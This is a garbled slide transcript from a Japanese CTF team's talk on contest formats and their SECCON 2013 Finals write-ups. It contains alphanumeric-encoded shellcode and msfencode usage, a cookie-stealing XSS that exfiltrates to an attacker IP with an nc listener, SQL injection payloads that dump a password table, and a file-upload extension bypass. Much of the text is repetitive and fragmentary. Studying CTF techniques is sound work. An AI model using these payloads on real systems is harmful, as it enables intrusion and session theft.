ctfはとんでもないものを 盗んでいきました。私の時間です…
TRANSCRIPT
- 1. CTF EpsilonDelta
2. CTF 3. CTFCapture The Flag 4. CTF 5. CTF 6. CTF Capture The Flag 7. CTF 8. 2CTF CTF2 Jeopardy Attack-Defense 9. Jeopardy 10. Jeopardy 11. Jeopardy 12. Jeopardy 13. Attack-Defense 14. Attack-Defense FLAG AFLAG BFLAG C 15. Attack-Defense FLAG A FLAG BFLAG C 16. Attack-Defense FLAG A FLAGFLAG BFLAG C 17. Attack-Defense AFLAG FLAG FLAG BFLAG C 18. Attack-Defense 19. Attack-Defense SLA 20. King of the HillAttack-Defense 21. King of the Hill FLAGFLAGFLAG AFLAG FLAG B 22. King of the Hill FLAGFLAGFLAG FLAGFLAG AFLAG B 23. King of the Hill FLAG FLAGFLAG FLAGFLAG AFLAG B 24. King of the Hill FLAG FLAG FLAG FLAG FLAG AB 25. King of the Hill FLAG FLAG FLAG FLAG FLAGAB 26. King of the Hill FLAG FLAG 27. CTF 28. Reversing FLAG Windows/Linux 29. Pwning Exploit FLAG 30. Web FLAG SQL Injection, XSS PHPJavascript 31. Cryptography FLAG RSA 32. Forensics FLAG 33. Steganography FLAG 34. Trivia FLAG Reconnaissance 35. EpsilonDelta 36. EpsilonDeltaCTF 37. EpsilonDelta CTFTime1 32 1 38. EpsilonDelta 201330 12 124~48... 39. Skype 40. 48 41. 24 42. LAC IDA Pro @IT 43. 44. CSAW CTF Qualication Round 2012 20129 CTF 636174 45. DEFCON CTF Qualier 2013 CTF DEFCON 41479 46. CSAW CTF Qualication Round 2013 138339 1 47. No cON Name CTF 2013 13 12 48. No cON Name CTF 2013 201311 49. No cON Name CTF 2013 King of the Hill 6 50. Codegate CTF Preliminary 2014 1 28339 U-20Junior 51. SECCON 2012 52. SECCON 2012 : : 8 53. SECCON 2013 9 + 54. SECCON 2013 4 / 10 55. SECCON 2013 56. SECCON 2013 3/1-2 King of the Hill 57. SECCON 2013 2 58. 59. 60. 1 2 61. Writeup 62. SECCON 2013 Finals 2tenkaku Writeup 63. 64. 65. 66. SECCON CTF 67. SECCON CTF CTFWriteup ... 68. SECCON CTF CTFWriteup... CTF 69. Writeup? 70. Writeup? Write up 71. Writeup? Write up 72. Writeup? Write up 73. Writeup? Write up 74. Writeup? Write up 75. 76. 2 1: 13:00 20:002: 09:00 14:00 77. 2 1: 13:00 20:00 2: 09:00 14:00King on the hill() 78. 2 1: 13:00 20:002: 09:00 14:00King on the hill()6 63130 79. 80. 2tenkaku 81. 2tenkaku .... 82. 2tenkaku ....Babel 83. 2tenkaku ....Babel 31... 84. 2tenkaku 85. 86. 4 FLAGFLAGkeyword.txt 87. 4 FLAG FLAGkeyword.txt 88. 89. 90. ()filter 91. 92. CPU 93. CPU 94. CPU shell 95. CPU shellshellcode 96. CPU shellshellcode2tenkakushellcode 97. 98. fork setrlimitshellforkkeyword.txtshellcode 99. fork shellforksetrlimit keyword.txtshellcodefilter 100. stage0filter shellcodeexecvecatshellcode execve("cat", {"cat", "keyword.txt", NULL}, NULL) 101. stage0 102. stage1 103. stage1filter isalnum(shellcode[i]) == trueshellcodeA-Za-z0-9 104. Alpha numeric 105. Alpha numeric 106. Alpha numeric () 107. Alpha numeric () 108. Alpha numeric () 109. Alpha numeric () Metasploitshellcodemsfencode -e x86/alpha_mixed BufferRegister=EAX 110. ... 111. ... 112. Metasploit 113. Metasploit ....... 114. .... 115. 116. Metasploit 117. encode 118. shellcode 119. shellcode13 120. shellcode13 Metasploit 121. shellcode13 Metasploit 122. shellcode13 Metasploit list 123. 124. Ph0E00X5wz00PPPPPPPPaTZ12h0000X5000 0PZJRRRRRRRRah0D00X50x00PTX10ZX00h0 000X50000PZJPRDDYLLZPRQQQQQQQQaZX 5sO005A000PTX10RX5AAAA5zqqqPRX5AAAA 5qqqtPRX500AA5bhtqPRX500005acdiPRX50 0005GdibPRX501005XZUIPRX5500A5ZBToP RX500005HD0XPRX500005dkXDPRX5A0045 nRYZPRX500005SQDXPRX5000A5bbXnPRX5 00005jbbbPRX5AAA15qqqaPRX5A0AA5qhtqP RX50AAA5XqqqPT 125. 126. (0xYYisalnum(0xYY) == true) push 0xYYYYYYYY push (register) pop eax, ecx, edx() xor eax, 0xYYYYYYYY() xor [register], dh xor [register], esi inc (register) dec(register) 127. eax, ecx, edx 128. eax, ecx, edx push 0xYYYYYYYY; pop eax, ecx, edx3 129. eax, ecx, edx push 0xYYYYYYYY; pop eax, ecx, edx 3alnum0xZZ 130. eax, ecx, edx push 0xYYYYYYYY; pop eax, ecx, edx 3alnum0xZZ xor eax, 0xYYYYYYYY2 0 127 131. eax, ecx, edx push 0xYYYYYYYY; pop eax, ecx, edx 3alnum0xZZ xor eax, 0xYYYYYYYY2 0 127xor [register], dh(dec edx0xffffffff) push eax; push esp; pop eax; xor [eax], dh; pop eax 0 1270xffxor128 255 132. 133. shellcodeshellcode 134. shellcodeshellcodexor [eax], esi 135. shellcodeshellcodexor [eax], esi eaxaddresi 136. shellcodeshellcodexor [eax], esi eaxaddresi 137. push 138. push 139. push ret(0xC3)xor [eax], esi 140. shellcode4byte push push shellcoderet ret 141. stage1 142. 143. 110 144. 110 King on the hill 145. SECCON 2013 Finals Korin writeup @tyage 146. Korin http://korin.tower/ 147. Korin - 1 http://korin.tower/ 148. Korin - 1 You are not admin!!... 149. Korin - 1 You are not admin!!... 150. Korin - 1 151. Korin - 1 JavaScript Cookie XSS 152. Korin - 1 >@gmail.com 153. Korin - 1 >@gmail.com http://192.168.5.8/[cookie] JavaScript PC192.168.5.8 PC 154. Korin - 1 192.168.5.8 155. Korin - 1 192.168.5.8 nc -l -p 80 156. Korin - 1 192.168.5.8 nc -l -p 80 GET /CGISESSID=XXXXXXX... HTTP/1.1 Cookie 157. Korin - 1 192.168.5.8 nc -l -p 80 GET /CGISESSID=XXXXXXX... HTTP/1.1 Cookie Cookie 158. Korin - 1 You are admin level2! 1 159. Korin - 2 Message 160. Korin - 2 URL http://korin.tower/?action=view&id=111111111111111 161. Korin - 2 id or 1 162. Korin - 2 id or 1 163. Korin - 2 id or 1 SQL Injection 164. Korin - 2 or union select 1,1,1 -- 165. Korin - 2 DBMS 166. Korin - 2 DBMS MySQL or union select @@version,1,1 - Error 167. Korin - 2 DBMS MySQL or union select @@version,1,1 - Error Postgres SQL or union select version(),1,1 - Error 168. Korin - 2 DBMS MySQL or union select @@version,1,1 - Error Postgres SQL or union select version(),1,1 - Error SQLite or union select sqlite_version(),1,1 - 169. Korin - 2 SQLitesqlite_master SQL or union all select group_concat(sql),1,1 from sqlite_master -- 170. Korin - 2 SQLitesqlite_master SQL or union all select group_concat(sql),1,1 from sqlite_master -CREATE TABLE contact (id, name, mail, honbun), CREATE TABLE nextLVpassword (str), CREATE TABLE zdummy (dummy) 171. Korin - 2 or union all select str,1,1 from nextLVpassword -- 172. Korin - 2 or union all select str,1,1 from nextLVpassword - kinoko!! 173. Korin - 3 2 174. Korin - 3 test.php 175. Korin - 3 test.php filename does not contain .jpg jpg 176. Korin - 3 test.php filename does not contain .jpg jpg jpg 177. Korin - 3 test.php filename does not contain .jpg jpg jpg test.jpg.php 178. Korin - 3 test.php filename does not contain .jpg jpg jpg test.jpg.php http://korin.tower/uploaded/test.jpg.php 179. Korin - 3